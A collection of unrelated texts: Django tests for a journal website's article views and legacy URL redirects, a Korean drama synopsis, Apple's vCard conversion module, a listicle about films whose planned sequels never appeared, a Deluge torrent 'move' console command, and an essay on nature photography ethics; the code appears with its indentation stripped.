issue_id = 'dummy1515298'
article_id = '1001942du'
url = reverse('public:journal:article_raw_pdf', args=(
journal_id, issue_slug, issue_id, article_id
))
response = Client().get(url)
assert response.status_code == 404
@unittest.mock.patch.object(ArticleDigitalObject, 'pdf')
@unittest.mock.patch.object(subprocess, 'check_call')
@pytest.mark.parametrize('pages, expected_exception', [
([], True),
([1], True),
([1, 2], False),
])
def test_can_retrieve_the_firstpage_pdf_of_existing_articles(self, mock_check_call, mock_pdf, pages, expected_exception, monkeypatch):
monkeypatch.setattr(pikepdf._qpdf.Pdf, 'pages', pages)
with open(os.path.join(FIXTURE_ROOT, 'dummy.pdf'), 'rb') as f:
mock_pdf.content = io.BytesIO()
mock_pdf.content.write(f.read())
journal = JournalFactory()
issue = IssueFactory.create(
journal=journal, year=2010,
date_published=dt.datetime.now() - dt.timedelta(days=1000))
IssueFactory.create(
journal=journal, year=2010,
date_published=dt.datetime.now())
article = ArticleFactory.create(issue=issue)
journal_id = journal.localidentifier
issue_id = issue.localidentifier
article_id = article.localidentifier
url = article_raw_pdf_url(article)
request = RequestFactory().get(url)
request.user = AnonymousUser()
request.session = {}
request.subscriptions = UserSubscriptions()
# Raise exception if PDF has less than 2 pages.
if expected_exception:
with pytest.raises(PermissionDenied):
response = ArticleRawPdfFirstPageView.as_view()(
request, journal_code=journal_id, issue_slug=issue.volume_slug, issue_localid=issue_id,
localid=article_id)
else:
response = ArticleRawPdfFirstPageView.as_view()(
request, journal_code=journal_id, issue_slug=issue.volume_slug, issue_localid=issue_id,
localid=article_id)
assert response.status_code == 200
assert response['Content-Type'] == 'application/pdf'
def test_cannot_be_accessed_if_the_article_is_not_in_open_access(self):
journal = JournalFactory(open_access=False)
issue = IssueFactory.create(
journal=journal, year=dt.datetime.now().year, date_published=dt.datetime.now())
article = ArticleFactory.create(issue=issue)
journal_code = journal.code
issue_id = issue.localidentifier
article_id = article.localidentifier
url = article_raw_pdf_url(article)
request = RequestFactory().get(url)
request.user = AnonymousUser()
request.session = {}
request.subscriptions = UserSubscriptions()
response = ArticleRawPdfView.as_view()(
request, journal_code=journal_code, issue_slug=issue.volume_slug,
issue_localid=issue_id, localid=article_id)
assert isinstance(response, HttpResponseRedirect)
assert response.url == article_detail_url(article)
def test_cannot_be_accessed_if_the_publication_of_the_article_is_not_allowed_by_its_authors(self): # noqa
journal = JournalFactory(open_access=False)
issue = IssueFactory.create(
journal=journal, year=2010, date_published=dt.datetime.now())
article = ArticleFactory.create(issue=issue, publication_allowed=False)
journal_code = journal.code
issue_id = issue.localidentifier
article_id = article.localidentifier
url = article_raw_pdf_url(article)
request = RequestFactory().get(url)
request.user = AnonymousUser()
request.session = {}
request.subscriptions = UserSubscriptions()
response = ArticleRawPdfView.as_view()(
request, journal_code=journal_code, issue_slug=issue.volume_slug,
issue_localid=issue_id, localid=article_id)
assert isinstance(response, HttpResponseRedirect)
assert response.url == article_detail_url(article)
class TestLegacyUrlsRedirection:
def test_can_redirect_issue_support_only_volume_and_year(self):
journal = JournalFactory(code='test')
issue = IssueFactory(journal=journal, volume="1", number="1", year="2017")
IssueFactory(journal=issue.journal, volume="1", number="2", year="2017")
article = ArticleFactory()
article.issue.volume = "1"
article.issue.number = "1"
article.issue.year = "2017"
article.issue.save()
article2 = ArticleFactory()
article2.issue.journal = article.issue.journal
article2.issue.volume = "1"
article2.issue.number = "2"
article2.issue.year = "2017"
article2.issue.save()
url = "/revue/{journal_code}/{year}/v{volume}/n/".format(
journal_code=article.issue.journal.code,
year=article.issue.year,
volume=article.issue.volume,
)
resp = Client().get(url)
assert resp.url == reverse('public:journal:issue_detail', kwargs=dict(
journal_code=article2.issue.journal.code,
issue_slug=article2.issue.volume_slug,
localidentifier=article2.issue.localidentifier,
))
def test_can_redirect_issue_detail_with_empty_volume(self):
issue = IssueFactory(number="1", volume="1", year="2017")
issue2 = IssueFactory(journal=issue.journal, volume="2", number="1", year="2017")
url = "/revue/{journal_code}/{year}/v/n{number}/".format(
journal_code=issue.journal.code,
number=issue.number,
year=issue.year,
)
resp = Client().get(url)
assert resp.url == reverse('public:journal:issue_detail', kwargs=dict(
journal_code=issue2.journal.code,
issue_slug=issue2.volume_slug,
localidentifier=issue2.localidentifier,
))
def test_can_redirect_article_from_legacy_urls(self):
from django.utils.translation import deactivate_all
article = ArticleFactory()
article.issue.volume = "1"
article.issue.save()
url = '/revue/{journal_code}/{issue_year}/v{issue_volume}/n/{article_localidentifier}.html'.format( # noqa
journal_code=article.issue.journal.code,
issue_year=article.issue.year,
issue_volume=article.issue.volume,
article_localidentifier=article.localidentifier
)
resp = Client().get(url)
assert resp.status_code == 301
url = '/revue/{journal_code}/{issue_year}/v/n/{article_localidentifier}.html'.format( # noqa
journal_code=article.issue.journal.code,
issue_year=article.issue.year,
article_localidentifier=article.localidentifier
)
resp = Client().get(url)
assert resp.status_code == 301
url = '/revue/{journal_code}/{issue_year}/v/n{issue_number}/{article_localidentifier}.html'.format( # noqa
journal_code=article.issue.journal.code,
issue_year=article.issue.year,
issue_number=article.issue.number,
article_localidentifier=article.localidentifier
)
resp = Client().get(url)
assert resp.url == article_detail_url(article)
assert "/fr/" in resp.url
assert resp.status_code == 301
deactivate_all()
resp = Client().get(url + "?lang=en")
assert resp.url == article_detail_url(article)
assert "/en/" in resp.url
assert resp.status_code == 301
url = '/en/revue/{journal_code}/{issue_year}/v/n{issue_number}/{article_localidentifier}.html'.format( # noqa
journal_code=article.issue.journal.code,
issue_year=article.issue.year,
issue_number=article.issue.number,
article_localidentifier=article.localidentifier
)
deactivate_all()
resp = Client().get(url)
assert resp.url == article_detail_url(article)
assert "/en/" in resp.url
assert resp.status_code == 301
@pytest.mark.parametrize("pattern", (
"/revue/{journal_code}/{year}/v{volume}/n{number}/",
"/culture/{journal_localidentifier}/{issue_localidentifier}/index.html"
))
def test_can_redirect_issues_from_legacy_urls(self, pattern):
article = ArticleFactory()
article.issue.volume = "1"
article.issue.number = "1"
article.issue.save()
url = pattern.format(
journal_code=article.issue.journal.code,
year=article.issue.year,
volume=article.issue.volume,
number=article.issue.number,
journal_localidentifier=article.issue.journal.localidentifier,
issue_localidentifier=article.issue.localidentifier,
            article_localidentifier=article.localidentifier,
)
resp = Client().get(url)
assert resp.url == reverse('public:journal:issue_detail', kwargs=dict(
journal_code=article.issue.journal.code,
issue_slug=article.issue.volume_slug,
localidentifier=article.issue.localidentifier
))
assert resp.status_code == 301
def test_can_redirect_journals_from_legacy_urls(self):
article = ArticleFactory()
article.issue.volume = "1"
article.issue.number = "1"
article.issue.save()
url = "/revue/{code}/".format(
code=article.issue.journal.code,
)
resp = Client().get(url)
assert resp.url == journal_detail_url(article.issue.journal)
assert resp.status_code == 301
class TestArticleFallbackRedirection:
@pytest.fixture(params=itertools.product(
[{'code': 'nonexistent'}],
[
'legacy_journal:legacy_journal_detail',
'legacy_journal:legacy_journal_detail_index',
'legacy_journal:legacy_journal_authors',
'legacy_journal:legacy_journal_detail_culture',
'legacy_journal:legacy_journal_detail_culture_index',
'legacy_journal:legacy_journal_authors_culture'
]
))
def journal_url(self, request):
kwargs = request.param[0]
url = request.param[1]
return reverse(url, kwargs=kwargs)
@pytest.fixture(params=itertools.chain(
itertools.product(
[{
'journal_code': 'nonexistent',
'year': "1974",
'v': "7",
'n': "1",
}],
["legacy_journal:legacy_issue_detail", "legacy_journal:legacy_issue_detail_index"]
),
itertools.product(
[{
'journal_code': 'nonexistent',
'year': "1974",
'v': "7",
'n': "",
}],
[
"legacy_journal:legacy_issue_detail",
"legacy_journal:legacy_issue_detail_index"
],
),
itertools.product([{
'journal_code': 'nonexistent',
'localidentifier': 'nonexistent'
}], ["legacy_journal:legacy_issue_detail_culture",
"legacy_journal:legacy_issue_detail_culture_index"],
)
))
def issue_url(self, request):
kwargs = request.param[0]
url = request.param[1]
return reverse(url, kwargs=kwargs)
@pytest.fixture(params=itertools.chain(
itertools.product(
[{
'journal_code': 'nonexistent', 'year': 2004, 'v': 1, 'issue_number': 'nonexistent',
'localid': 'nonexistent', 'format_identifier': 'html', 'lang': 'fr'
}],
[
"legacy_journal:legacy_article_detail",
"legacy_journal:legacy_article_detail_culture"
],
),
[
({'localid': 'nonexistent'}, 'legacy_journal:legacy_article_id'),
({'journal_code': 'nonexistent',
'issue_localid': 'nonexistent', 'localid': 'nonexistent',
'format_identifier': 'html'},
'legacy_journal:legacy_article_detail_culture_localidentifier')
]),
)
def article_url(self, request):
kwargs = request.param[0]
url = request.param[1]
return reverse(url, kwargs=kwargs)
def test_legacy_url_for_nonexistent_journals_404s(self, journal_url):
response = Client().get(journal_url, follow=True)
assert response.status_code == 404
def test_legacy_url_for_nonexistent_issues_404s(self, issue_url):
response = Client().get(issue_url, follow=True)
assert response.status_code == 404
def test_legacy_url_for_nonexistent_articles_404s(self, article_url):
response = Client().get(article_url, follow=True)
assert response.status_code == 404
class TestArticleXmlView:
def test_can_retrieve_xml_of_existing_articles(self):
journal = JournalFactory(open_access=True)
issue = IssueFactory.create(
journal=journal, year=2010, is_published=True,
date_published=dt.datetime.now() - dt.timedelta(days=1000))
article = ArticleFactory.create(issue=issue)
journal_id = issue.journal.localidentifier
issue_id = issue.localidentifier
article_id = article.localidentifier
url = reverse('public:journal:article_raw_xml', args=(
journal_id, issue.volume_slug, issue_id, article_id
))
response = Client().get(url)
assert response.status_code == 200
assert response['Content-Type'] == 'application/xml'
class TestArticleMediaView(TestCase):
@unittest.mock.patch.object(MediaDigitalObject, 'content')
def test_can_retrieve_the_pdf_of_existing_articles(self, mock_content):
# Setup
with open(os.path.join(FIXTURE_ROOT, 'pixel.png'), 'rb') as f:
mock_content.content = io.BytesIO()
mock_content.content.write(f.read())
mock_content.mimetype = 'image/png'
issue = IssueFactory.create(date_published=dt.datetime.now())
article = ArticleFactory.create(issue=issue)
issue_id = issue.localidentifier
article_id = article.localidentifier
request = RequestFactory().get('/')
# Run
response = ArticleMediaView.as_view()(
request, journal_code=issue.journal.code, issue_localid=issue_id,
localid=article_id, media_localid='test')
# Check
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'image/png')
class TestExternalURLRedirectViews:
def test_can_redirect_to_issue_external_url(self):
issue = IssueFactory.create(
date_published=dt.datetime.now(),
external_url="http://www.erudit.org"
)
response = Client().get(
reverse(
'public:journal:issue_external_redirect',
kwargs={'localidentifier': issue.localidentifier}
)
)
assert response.status_code == 302
def test_can_redirect_to_journal_external_url(self):
journal = JournalFactory(code='journal1', external_url='http://www.erudit.org')
response = Client().get(
reverse(
'public:journal:journal_external_redirect',
kwargs={'code': journal.code}
)
)
assert response.status_code == 302
@pytest.mark.parametrize('export_type', ['bib', 'enw', 'ris'])
def test_article_citation_doesnt_html_escape(export_type):
# citations exports don't HTML-escape values (they're not HTML documents).
    # TODO: test authors' names. Templates directly refer to `erudit_object` and we don't have
    # a proper mechanism in the upcoming fake fedora API to fake values on the fly yet.
title = "rock & rollin'"
article = ArticleFactory.create(title=title)
issue = article.issue
url = reverse('public:journal:article_citation_{}'.format(export_type), kwargs={
'journal_code': issue.journal.code, 'issue_slug': issue.volume_slug,
'issue_localid': issue.localidentifier, 'localid': article.localidentifier})
response = Client().get(url)
content = response.content.decode()
assert title in content
@pytest.mark.parametrize("view_name", (
"article_detail",
"article_summary",
"article_biblio",
"article_toc",
))
def test_no_html_in_structured_data(view_name):
article = ArticleFactory(
from_fixture="038686ar",
localidentifier="article",
issue__localidentifier="issue",
issue__year="2019",
issue__journal__code="journal",
)
url = reverse(f"public:journal:{view_name}", kwargs={
"journal_code": article.issue.journal.code,
"issue_slug": article.issue.volume_slug,
"issue_localid": article.issue.localidentifier,
"localid": article.localidentifier,
})
response = Client().get(url)
content = response.content.decode()
expected = '{\n ' \
'"@type": "ListItem",\n ' \
'"position": 5,\n ' \
'"item": {\n ' \
'"@id": "http://example.com/fr/revues/journal/2019-issue/article/",\n ' \
'"name": "Constantin, François (dir.), Les biens publics mondiaux. ' \
'Un mythe légitimateur pour l’action collective\xa0?, ' \
'coll. Logiques politiques, Paris, L’Harmattan, 2002, 385\xa0p."\n ' \
'}\n ' \
'}'
assert expected in content
|
Royal Physician Choi Won becomes entangled in a plot to poison King Injong and is now a fugitive. He tries to save his daughter, Choi Rang, who suffers from an incurable disease; Choi Won has raised her alone since his wife passed away. Hong Da In is the nurse who is in love with him.
Meanwhile, Lee Jung Hwan is the Euigeumbu detective assigned to capture him, while the fugitive Choi Won gets help from a bandit's daughter, So Baek. Crown Prince Lee Ho grows suspicious and comes to believe he was betrayed by the one person in the world he trusted.
Song Ji Hyo (Da In) pales in comparison! I think everyone who watched cared more about their relationship, and that's simply because of the chemistry. Sung Woong as Do Moon stood out to me throughout the drama as Da In's father's henchman. You wanted to hate him but simply couldn't help loving him and his beautiful (and real) mane of glory! I will remember his name from now on.
|
##
# Copyright (c) 2006-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
Utilities for converting a Record to a vCard
"""
__all__ = [
"vCardFromRecord"
]
from pycalendar.vcard.adr import Adr
from pycalendar.vcard.n import N
from twext.python.log import Logger
from twext.who.idirectory import FieldName, RecordType
from twisted.internet.defer import inlineCallbacks, returnValue
from twistedcaldav.config import config
from twistedcaldav.vcard import Component, Property, vCardProductID
from txdav.who.idirectory import FieldName as CalFieldName, \
RecordType as CalRecordType
from txweb2.dav.util import joinURL
log = Logger()
recordTypeToVCardKindMap = {
RecordType.user: "individual",
RecordType.group: "group",
CalRecordType.location: "location",
CalRecordType.resource: "device",
}
vCardKindToRecordTypeMap = {
"individual": RecordType.user,
"group": RecordType.group,
"org": RecordType.group,
"location": CalRecordType.location,
"device": CalRecordType.resource,
}
# all possible generated parameters.
vCardPropToParamMap = {
# "PHOTO": {"ENCODING": ("B",), "TYPE": ("JPEG",), },
"ADR": {"TYPE": ("WORK", "PREF", "POSTAL", "PARCEL",),
"LABEL": None, "GEO": None, },
"LABEL": {"TYPE": ("POSTAL", "PARCEL",)},
# "TEL": {"TYPE": None, }, # None means param value can be anything
"EMAIL": {"TYPE": None, },
    # "KEY": {"ENCODING": ("B",), "TYPE": ("PGPPUBLICKEY", "USERCERTIFICATE", "USERPKCS12DATA", "USERSMIMECERTIFICATE",)},
# "URL": {"TYPE": ("WEBLOG", "HOMEPAGE",)},
# "IMPP": {"TYPE": ("PREF",), "X-SERVICE-TYPE": None, },
# "X-ABRELATEDNAMES": {"TYPE": None, },
# "X-AIM": {"TYPE": ("PREF",), },
# "X-JABBER": {"TYPE": ("PREF",), },
# "X-MSN": {"TYPE": ("PREF",), },
# "X-ICQ": {"TYPE": ("PREF",), },
}
vCardConstantProperties = {
# ====================================================================
# 3.6 EXPLANATORY TYPES http://tools.ietf.org/html/rfc2426#section-3.6
# ====================================================================
# 3.6.3 PRODID
"PRODID": vCardProductID,
# 3.6.9 VERSION
"VERSION": "3.0",
}
@inlineCallbacks
def vCardFromRecord(record, forceKind=None, addProps=None, parentURI=None):
def isUniqueProperty(newProperty, ignoredParameters={}):
existingProperties = vcard.properties(newProperty.name())
for existingProperty in existingProperties:
if ignoredParameters:
existingProperty = existingProperty.duplicate()
for paramName, paramValues in ignoredParameters.iteritems():
for paramValue in paramValues:
existingProperty.removeParameterValue(paramName, paramValue)
if existingProperty == newProperty:
return False
return True
def addUniqueProperty(newProperty, ignoredParameters=None):
if isUniqueProperty(newProperty, ignoredParameters):
vcard.addProperty(newProperty)
else:
            log.info(
                "Ignoring property {prop!r}: it is a duplicate",
                prop=newProperty
            )
# =======================================================================
# start
# =======================================================================
log.debug(
"vCardFromRecord: record={record}, forceKind={forceKind}, addProps={addProps}, parentURI={parentURI}",
record=record, forceKind=forceKind, addProps=addProps, parentURI=parentURI)
if forceKind is None:
kind = recordTypeToVCardKindMap.get(record.recordType, "individual")
else:
kind = forceKind
constantProperties = vCardConstantProperties.copy()
if addProps:
for key, value in addProps.iteritems():
if key not in constantProperties:
constantProperties[key] = value
# create vCard
vcard = Component("VCARD")
# add constant properties
for key, value in constantProperties.items():
vcard.addProperty(Property(key, value))
# ===========================================================================
# 2.1 Predefined Type Usage
# ===========================================================================
# 2.1.4 SOURCE Type http://tools.ietf.org/html/rfc2426#section-2.1.4
if parentURI:
uri = joinURL(parentURI, record.fields[FieldName.uid].encode("utf-8") + ".vcf")
# seems like this should be in some standard place.
if (config.EnableSSL or config.BehindTLSProxy) and config.SSLPort:
if config.SSLPort == 443:
source = "https://{server}{uri}".format(server=config.ServerHostName, uri=uri)
else:
source = "https://{server}:{port}{uri}".format(server=config.ServerHostName, port=config.SSLPort, uri=uri)
else:
if config.HTTPPort == 80:
source = "http://{server}{uri}".format(server=config.ServerHostName, uri=uri)
else:
source = "http://{server}:{port}{uri}".format(server=config.ServerHostName, port=config.HTTPPort, uri=uri)
vcard.addProperty(Property("SOURCE", source))
# =======================================================================
# 3.1 IDENTIFICATION TYPES http://tools.ietf.org/html/rfc2426#section-3.1
# =======================================================================
# 3.1.1 FN
vcard.addProperty(Property("FN", record.fields[FieldName.fullNames][0].encode("utf-8")))
# 3.1.2 N
# TODO: Better parsing
fullNameParts = record.fields[FieldName.fullNames][0].split()
first = fullNameParts[0] if len(fullNameParts) >= 2 else None
last = fullNameParts[len(fullNameParts) - 1]
middle = fullNameParts[1] if len(fullNameParts) == 3 else None
prefix = None
suffix = None
nameObject = N(
first=first.encode("utf-8") if first else None,
last=last.encode("utf-8") if last else None,
middle=middle.encode("utf-8") if middle else None,
prefix=prefix.encode("utf-8") if prefix else None,
suffix=suffix.encode("utf-8") if suffix else None,
)
vcard.addProperty(Property("N", nameObject))
# 3.1.3 NICKNAME
nickname = record.fields.get(CalFieldName.abbreviatedName)
if nickname:
vcard.addProperty(Property("NICKNAME", nickname.encode("utf-8")))
# UNIMPLEMENTED
# 3.1.4 PHOTO
# 3.1.5 BDAY
# ============================================================================
# 3.2 Delivery Addressing Types http://tools.ietf.org/html/rfc2426#section-3.2
# ============================================================================
# 3.2.1 ADR
#
# Experimental:
# Use vCard 4.0 ADR: http://tools.ietf.org/html/rfc6350#section-6.3.1
params = {}
geo = record.fields.get(CalFieldName.geographicLocation)
if geo:
params["GEO"] = geo.encode("utf-8")
label = record.fields.get(CalFieldName.streetAddress)
if label:
params["LABEL"] = label.encode("utf-8")
#
extended = record.fields.get(CalFieldName.floor)
# TODO: Parse?
street = record.fields.get(CalFieldName.streetAddress)
city = None
region = None
postalcode = None
country = None
if extended or street or city or region or postalcode or country or params:
params["TYPE"] = ["WORK", "PREF", "POSTAL", "PARCEL", ]
vcard.addProperty(
Property(
"ADR", Adr(
# pobox = box,
extended=extended.encode("utf-8") if extended else None,
street=street.encode("utf-8") if street else None,
locality=city.encode("utf-8") if city else None,
region=region.encode("utf-8") if region else None,
postalcode=postalcode.encode("utf-8") if postalcode else None,
country=country.encode("utf-8") if country else None,
),
params=params
)
)
# 3.2.2 LABEL
# label = record.fields.get(CalFieldName.streetAddress)
if label:
vcard.addProperty(Property("LABEL", label.encode("utf-8"), params={"TYPE": ["POSTAL", "PARCEL", ]}))
# ======================================================================================
# 3.3 TELECOMMUNICATIONS ADDRESSING TYPES http://tools.ietf.org/html/rfc2426#section-3.3
# ======================================================================================
#
# UNIMPLEMENTED
# 3.3.1 TEL
# 3.3.2 EMAIL
preferredWorkParams = {"TYPE": ["WORK", "PREF", "INTERNET", ], }
workParams = {"TYPE": ["WORK", "INTERNET", ], }
params = preferredWorkParams
for emailAddress in record.fields.get(FieldName.emailAddresses, ()):
addUniqueProperty(Property("EMAIL", emailAddress.encode("utf-8"), params=params), ignoredParameters={"TYPE": ["PREF", ]})
params = workParams
# UNIMPLEMENTED:
# 3.3.3 MAILER
#
# =====================================================================
# 3.4 GEOGRAPHICAL TYPES http://tools.ietf.org/html/rfc2426#section-3.4
# =====================================================================
#
# UNIMPLEMENTED:
# 3.4.1 TZ
#
# 3.4.2 GEO
geographicLocation = record.fields.get(CalFieldName.geographicLocation)
if geographicLocation:
vcard.addProperty(Property("GEO", geographicLocation.encode("utf-8")))
# =======================================================================
# 3.5 ORGANIZATIONAL TYPES http://tools.ietf.org/html/rfc2426#section-3.5
# =======================================================================
#
# UNIMPLEMENTED:
# 3.5.1 TITLE
# 3.5.2 ROLE
# 3.5.3 LOGO
# 3.5.4 AGENT
# 3.5.5 ORG
#
# ====================================================================
# 3.6 EXPLANATORY TYPES http://tools.ietf.org/html/rfc2426#section-3.6
# ====================================================================
#
# UNIMPLEMENTED:
# 3.6.1 CATEGORIES
# 3.6.2 NOTE
#
# ADDED WITH CONSTANT PROPERTIES:
# 3.6.3 PRODID
#
# UNIMPLEMENTED:
# 3.6.5 SORT-STRING
# 3.6.6 SOUND
# 3.6.7 UID
vcard.addProperty(Property("UID", record.fields[FieldName.uid].encode("utf-8")))
# UNIMPLEMENTED:
# 3.6.8 URL
# ADDED WITH CONSTANT PROPERTIES:
# 3.6.9 VERSION
# ===================================================================
# 3.7 SECURITY TYPES http://tools.ietf.org/html/rfc2426#section-3.7
# ===================================================================
# UNIMPLEMENTED:
# 3.7.1 CLASS
# 3.7.2 KEY
# ===================================================================
# X Properties
# ===================================================================
# UNIMPLEMENTED:
# X-<instant messaging type> such as:
# "AIM", "FACEBOOK", "GADU-GADU", "GOOGLE TALK", "ICQ", "JABBER", "MSN", "QQ", "SKYPE", "YAHOO",
# X-MAIDENNAME
# X-PHONETIC-FIRST-NAME
# X-PHONETIC-MIDDLE-NAME
# X-PHONETIC-LAST-NAME
# X-ABRELATEDNAMES
# X-ADDRESSBOOKSERVER-KIND
if kind == "group":
vcard.addProperty(Property("X-ADDRESSBOOKSERVER-KIND", kind))
# add members
# FIXME: members() is a deferred, so all of vCardFromRecord is deferred.
for memberRecord in (yield record.members()):
cua = memberRecord.canonicalCalendarUserAddress(False)
if cua:
vcard.addProperty(Property("X-ADDRESSBOOKSERVER-MEMBER", cua.encode("utf-8")))
# ===================================================================
# vCard 4.0 http://tools.ietf.org/html/rfc6350
# ===================================================================
# UNIMPLEMENTED:
# 6.4.3 IMPP http://tools.ietf.org/html/rfc6350#section-6.4.3
#
# 6.1.4 KIND http://tools.ietf.org/html/rfc6350#section-6.1.4
#
# see also: http://www.iana.org/assignments/vcard-elements/vcard-elements.xml
#
vcard.addProperty(Property("KIND", kind))
# one more X- related to kind
if kind == "org":
vcard.addProperty(Property("X-ABShowAs", "COMPANY"))
log.debug("vCardFromRecord: vcard=\n{vcard}", vcard=vcard)
returnValue(vcard)
|
Sometimes, it's obvious to all concerned that they're onto an absolute winner. "This film will make Star Wars look like a flop" they cry.
"And seeing as there's definitely going to be a sequel or two, we may as well set it up nicely so that the whole thing flows properly when hordes of fans watch the trilogy in one sitting in ten years' time".
Bless their optimism, but it doesn't always work out like that. Here are ten films that were begging to be continued, but were left hanging in the wind, like a broken street sign which solemnly reads "No Chance Close (Cul de Sac)".
Considering Nintendo have put every possible spin on their most bankable stars - the lovable Italian plumbers Mario and Luigi - creating a gargantuan franchise in the meantime, it must surely have been the intention to do the same with the movies. Unfortunately the tiny dual problems of shocking reviews and box office failure put paid to that idea, and so we'll never get to find out what was out there in that final scene. To be fair, we can probably cope.
It's surprising that a sequel was never made for Godzilla - true, it received something of a critical mauling, but it did well enough at the box office, which is usually all that Hollywood really cares about. It was particularly strange considering the ending had been specifically engineered to lead straight on to a second installment. Yes guys, you've definitely killed all the offspring and destroyed all the eggs. All of them. Definitely. No oversights there. Oh, no.
Now this really is a salient lesson in the perils of misplaced confidence. This film was so bolshy that it told viewers to stay tuned for the next episode, Buckaroo Banzai Against the World Crime League, but red faces no doubt ensued when it failed to materialise. The one and only film has become something of a cult classic, however, so maybe one day the long-awaited sequel will be made; in the meantime, fans can just enjoy what is undoubtedly one of the coolest end credit sequences ever.
It is a mystery that probably only The Incredibles can solve: why has there still not been a sequel to this film? It was, as is usual for a Pixar movie, critically acclaimed, it was a huge box office success, grossing over $600m against a $92m budget, and the final scene featured a brand new villain, 'The Underminer', arriving from beneath the ground, ready for another dust-up. However, it seems that writer and director Brad Bird holds the key: he is on record as saying he'll only do another one if it "is as good or better than the original" and he feels he hasn't had the time to come up with a strong enough story yet. Fair enough Brad, we'll wait a little longer.
Okay, so maybe it's not a huge surprise that this sequel didn't happen. It wasn't a complete box office disaster ($179 million worldwide from a $78 million budget) but legal wrangles and, okay, the fact that most people hated the first one have stalled a follow-up. Shame, as the end left the movie perfectly set up, with a stricken Bullseye showing that he has not lost his aim, and could live to fight another day.
Despite a huge cult following and two versions of the final scene which both lent themselves to a sequel, nothing has been forthcoming. The original ending saw a lone alien slug survive in a dog's mouth, while the alternate one saw hordes of them survive via Cameron's body, with their parent aliens returning to earth for good measure. It's been 17 years though so we're not holding our breath; the Stereo MCs made their second album quicker than that.
Oh, The Golden Compass, we had such high hopes for you. The first novel in a trilogy of books by Philip Pullman, this was slated to become a franchise to rival Lord of the Rings, but the project ground to a halt after disappointing (though not disastrous) box office returns. All of which is a shame for fans of the first movie, as producers were so sure that there'd be a follow-up that they didn't feel the need to put in final scenes which they felt, ironically, were somewhat controversial and so might scupper the next two films, leading to a rather abrupt ending. Bizarrely they made it into the video game adaptation, so at least there was some closure.
Possibly the most pure of the examples on this list. "I'll be back" croaks Skeletor, like an anorexic Arnold Schwarzenegger. Not with box office takings like that you won't boneface.
Why do they do it? Why? The end scene featured our "heroes" driving away in a pink Cadillac as a cartoon speech bubble cheerily proclaimed "We'll be back!". Unfortunately, abysmal reviews, terrible ticket sales and heavy criticism that the film was a poorly-disguised rip-off of E.T. meant that that Cadillac kept riding off into the distance forever.
An earnest, albeit slightly hare-brained attempt to create an American spin on The Ring, this horror saw teens playing an evil video game ("you die in the game, you die for real"). The end scene saw an unwitting video game store employee insert the game and start the sequence again; prime fodder for recurring installments of the franchise. Unfortunately for Stay Alive, they only got one life, there was no restart button, it really was game over after this and we've run out of gaming metaphors now.
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Nick Lanham <nick@afternight.org>
#
# This file is part of Deluge and is licensed under GNU General Public License 3.0, or later, with
# the additional special exception to link portions of this program with the OpenSSL library.
# See LICENSE for more details.
#
from __future__ import unicode_literals
import logging
import os.path
import deluge.component as component
from deluge.ui.client import client
from . import BaseCommand
log = logging.getLogger(__name__)
class Command(BaseCommand):
"""Move torrents' storage location"""
def add_arguments(self, parser):
parser.add_argument('torrent_ids', metavar='<torrent-id>', nargs='+', help=_('One or more torrent ids'))
parser.add_argument('path', metavar='<path>', help=_('The path to move the torrents to'))
def handle(self, options):
self.console = component.get('ConsoleUI')
if os.path.exists(options.path) and not os.path.isdir(options.path):
self.console.write('{!error!}Cannot Move Download Folder: %s exists and is not a directory' % options.path)
return
ids = []
names = []
for t_id in options.torrent_ids:
tid = self.console.match_torrent(t_id)
ids.extend(tid)
names.append(self.console.get_torrent_name(tid))
def on_move(res):
msg = 'Moved "%s" to %s' % (', '.join(names), options.path)
self.console.write(msg)
log.info(msg)
d = client.core.move_storage(ids, options.path)
d.addCallback(on_move)
return d
def complete(self, line):
line = os.path.abspath(os.path.expanduser(line))
ret = []
if os.path.exists(line):
# This is a correct path, check to see if it's a directory
if os.path.isdir(line):
# Directory, so we need to show contents of directory
# ret.extend(os.listdir(line))
for f in os.listdir(line):
# Skip hidden
if f.startswith('.'):
continue
f = os.path.join(line, f)
if os.path.isdir(f):
f += '/'
ret.append(f)
else:
# This is a file, but we could be looking for another file that
# shares a common prefix.
for f in os.listdir(os.path.dirname(line)):
if f.startswith(os.path.split(line)[1]):
ret.append(os.path.join(os.path.dirname(line), f))
else:
# This path does not exist, so let's do a listdir on its parent
# and find any matches.
ret = []
if os.path.isdir(os.path.dirname(line)):
for f in os.listdir(os.path.dirname(line)):
if f.startswith(os.path.split(line)[1]):
p = os.path.join(os.path.dirname(line), f)
if os.path.isdir(p):
p += '/'
ret.append(p)
return ret
|
When I first thought about starting a photography magazine I had to consider what kind of subject matter it would cover. Sitting right next to the most visited National Park in the United States, it only made sense to have nature photography as a major component. That just moved the question one step further down the line. What is nature photography? There doesn’t seem to be an easy answer.
Researching information online showed that there were some strong feelings on the topic. One school of thought is that nature photography, particularly wildlife photography, should be documentary and should have little post capture work done to it. The other school looks at photography as art and allows for more freedom in the interpretation of the image. Individual photographers fall all along that continuum. A few don’t even sharpen wildlife images and a few pass off composites as wildlife, but most are somewhere in between.
The Audubon Society has an interesting posting of the poll results they received from the thousands of people they questioned after they disqualified an image from their contest for being a composite image. Twenty-six percent of the respondents thought that Ansel Adams’ images were not nature photography because he dodged and burned in the darkroom. Sixty-six percent thought that the National Geographic cover that moved the pyramids around was ethical, or ethical if there was a disclaimer. Seventy-two percent thought that baiting was either OK, or OK if there was a disclosure of the use of bait. It was about half and half on whether game farm shots were nature photography.
Exploring my own feelings revealed that I believe both points of view are valid as long as the photographer makes it clear what was done to the image. Each individual can determine what he/she thinks is nature photography and what is art. There is a place in the world for both. We need scientific study of nature and journalistic presentations of the results. We also need beautiful images to inspire people to commit to saving the environment, as Ansel Adams’ work did.
Regardless of whether a particular image is journalistic or art, it needs to be captured in an ethical fashion. The North American Nature Photography Association and the American Birding Association each have a Code of Ethics that provide guidelines on how to act. The Park has regulations on how far to stay away from bears and elk (50 yards) and how to interact with other life in the fields. We all learn to leave nothing but footprints. No image is worth harming the subject.
